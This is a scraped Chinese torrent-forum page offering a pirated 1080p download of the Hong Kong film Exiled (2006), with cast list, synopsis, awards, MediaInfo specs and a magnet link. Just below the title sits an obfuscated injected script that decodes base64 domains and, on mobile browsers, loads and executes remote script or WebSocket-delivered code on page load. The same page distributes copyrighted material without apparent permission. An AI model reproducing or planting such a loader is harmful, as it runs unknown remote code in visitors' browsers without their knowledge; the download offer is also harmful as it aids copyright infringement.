放·逐[粤语音轨/中文字幕].Exiled.2006.Repack.1080p.迅雷下载 12.55GB

版主小s 3月前 424

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 放·逐 / 放逐 / Exiled

◎年 代 2006

◎产 地 中国香港

◎类 别 惊悚 / 犯罪

◎语 言 粤语

◎上映日期 2006-10-19(中国香港) / 2006-09-06(威尼斯电影节)

◎IMDb链接 https://www.imdb.com/title/tt0796212/

◎豆瓣评分 8.1/10 (94701人评价)

◎豆瓣链接 https://movie.douban.com/subject/1790577/

◎片 长 108分钟

◎导 演 杜琪峰 Johnnie To (id:1160186)

◎编 剧 司徒锦源 Kam-Yuen Szeto (id:1298766)

叶天成 Tin-Shing Yip (id:1306719)

杜琪峰 Johnnie To (id:1160186)

◎演 员 黄秋生 Anthony Wong Chau-Sang (id:1050076)

吴镇宇 Francis Ng (id:1037098)

张家辉 Nick Cheung (id:1037273)

任贤齐 Richie Jen (id:1009888)

何超仪 Josie Ho (id:1014212)

张耀扬 Roy Cheung (id:1012751)

林雪 Suet Lam (id:1274279)

任达华 Simon Yam (id:1031194)

林家栋 Ka Tung Lam (id:1050329)

张兆辉 Siu-Fai Cheung (id:1005843)

陈雅伦 Ellen Chan (id:1005623)

谭炳文 Ping-Man Tam (id:1317676)

许绍雄 Siu-Hung Hui (id:1274449)

黄志伟 Chi Wai Wong (id:1308890)

张家杰 Jeff Cheung (id:1391313)

黄华和 Wah Wo Wong (id:1355706)

鞠觉亮 Kok Leung Kuk (id:1315703)

庄澄 John Chong (id:1280710)

杜琪峰 Johnnie To (id:1160186)

丁云山 Wan San Ding (id:1388181)

盖·泽拉法 Guy Zerafa (id:1301675)

郑兆强 Siu-keung Cheng (id:1280597)

大卫·李察森 David M. Richardson (id:1295595)

张世杰 Stanley Cheung (id:1280624)

文润铃 Yun-Ling Man (id:1290093)

张家杰 Jeff Cheung (id:1391313)

罗永昌 Wing-cheong Law (id:1274489)

马文现 Stephen Ma (id:1290573)

◎标 签 香港 / 黑帮 / 银河映像 / 动作 / 犯罪 / 2006 / 枪战 / 剧情

◎简 介

澳门回归前三天,五位情深意重的杀手。杀手阿和(张家辉饰)与妻子阿静(何超仪饰)带着刚满一个月的孩子重返故地,阿火(黄秋生饰)与阿波(林雪饰)奉黑社会老大大飞(任达华饰)的命令来追杀阿和,但另一对好兄弟阿泰(吴镇宇饰)与阿猫(张耀扬饰)闻讯,为了情义前来阻止。冲突在阿和家突然爆发,又迅速重归平静。最后他们决定一起做一宗大买卖来解救阿和,在谢夫(张兆辉饰)那里,摆放在他们眼前的是两个选择:暗杀蛋卷强(林家栋饰)或者抢夺一吨黄金……最终他们选择了前者,然而却在餐厅和死对头大飞不期而遇,一场恶战难免。

◎获奖情况 (共13项)

第63届威尼斯电影节 (2006)

主竞赛单元 金狮奖 (提名)

└──杜琪峰 (id:1160186)

第43届台北金马影展 (2006)

金马奖 最佳剧情片(提名)

金马奖 最佳导演(提名)

└──杜琪峰 (id:1160186)

金马奖 最佳动作设计

└──黄志伟 (id:1308890)

└──凌振帮 (id:1311447)

金马奖 最佳剪辑(提名)

└──大卫·李察森 (id:1295595)

观众票选最佳影片

第26届香港电影金像奖 (2007)

最佳电影(提名)

└──杜琪峰 (id:1160186)

最佳导演(提名)

└──杜琪峰 (id:1160186)

最佳摄影(提名)

└──郑兆强 (id:1280597)

最佳剪接(提名)

└──大卫·李察森 (id:1295595)

第1届亚洲电影大奖 (2007)

最佳电影(提名)

最佳导演(提名)

└──杜琪峰 (id:1160186)

第7届华语电影传媒大奖 (2007)

评审团奖

└──杜琪峰 (id:1160186)

  1. General

  2. Unique ID : 333651702944395036564456472757705095199 (0xFB02FB069CA98389246891067E77B81F)

  3. Complete name : Exiled.2006.1080p.BluRay.x264.DTS.2Audio-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.6 GiB

  7. Duration : 1 h 48 min

  8. Overall bit rate : 16.5 Mb/s

  9. Movie name : Exiled 2006

  10. Encoded date : UTC 2021-06-26 01:09:38

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 48 min

  23. Bit rate : 14.3 Mb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.382

  34. Stream size : 10.9 GiB (87%)

  35. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  36. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  37. Language : English

  38. Default : Yes

  39. Forced : No


  40. Audio #1

  41. ID : 2

  42. ID in the original source medium : 4353 (0x1101)

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 48 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 509 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 16 bits

  54. Compression mode : Lossy

  55. Stream size : 1.15 GiB (9%)

  56. Title : Cantonese

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Audio #2

  62. ID : 3

  63. ID in the original source medium : 4354 (0x1102)

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 48 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 498 MiB (4%)

  77. Title : Mandarin

  78. Language : Chinese

  79. Service kind : Complete Main

  80. Default : Yes

  81. Forced : No

  82. Original source medium : Blu-ray


  83. Text #1

  84. ID : 4

  85. ID in the original source medium : 4609 (0x1201)

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 40 min

  91. Bit rate : 5 855 b/s

  92. Count of elements : 843

  93. Stream size : 4.22 MiB (0%)

  94. Title : chs

  95. Language : Chinese

  96. Default : Yes

  97. Forced : No

  98. Original source medium : Blu-ray


  99. Text #2

  100. ID : 5

  101. ID in the original source medium : 4610 (0x1202)

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 40 min

  107. Bit rate : 6 181 b/s

  108. Count of elements : 843

  109. Stream size : 4.46 MiB (0%)

  110. Title : cht

  111. Language : Chinese

  112. Default : Yes

  113. Forced : No

  114. Original source medium : Blu-ray


  115. Text #3

  116. ID : 6

  117. ID in the original source medium : 4611 (0x1203)

  118. Format : PGS

  119. Muxing mode : zlib

  120. Codec ID : S_HDMV/PGS

  121. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  122. Duration : 1 h 40 min

  123. Bit rate : 5 942 b/s

  124. Count of elements : 769

  125. Stream size : 4.28 MiB (0%)

  126. Language : English

  127. Default : Yes

  128. Forced : No

  129. Original source medium : Blu-ray


  130. Menu

  131. 00:00:00.000 : Chapter 01

  132. 00:06:28.721 : Chapter 02

  133. 00:15:14.371 : Chapter 03

  134. 00:18:35.030 : Chapter 04

  135. 00:26:13.738 : Chapter 05

  136. 00:35:42.473 : Chapter 06

  137. 00:40:10.116 : Chapter 07

  138. 00:50:31.570 : Chapter 08

  139. 00:55:10.223 : Chapter 09

  140. 01:04:39.584 : Chapter 10

  141. 01:11:36.750 : Chapter 11

  142. 01:17:10.542 : Chapter 12

  143. 01:26:26.097 : Chapter 13

  144. 01:33:59.050 : Chapter 14

  145. 01:41:18.989 : Chapter 15

  146. 01:45:05.632 : Chapter 16


TAGS 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:8BC2D59AD679DF81AC27DD2578DADEB896B82E26
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回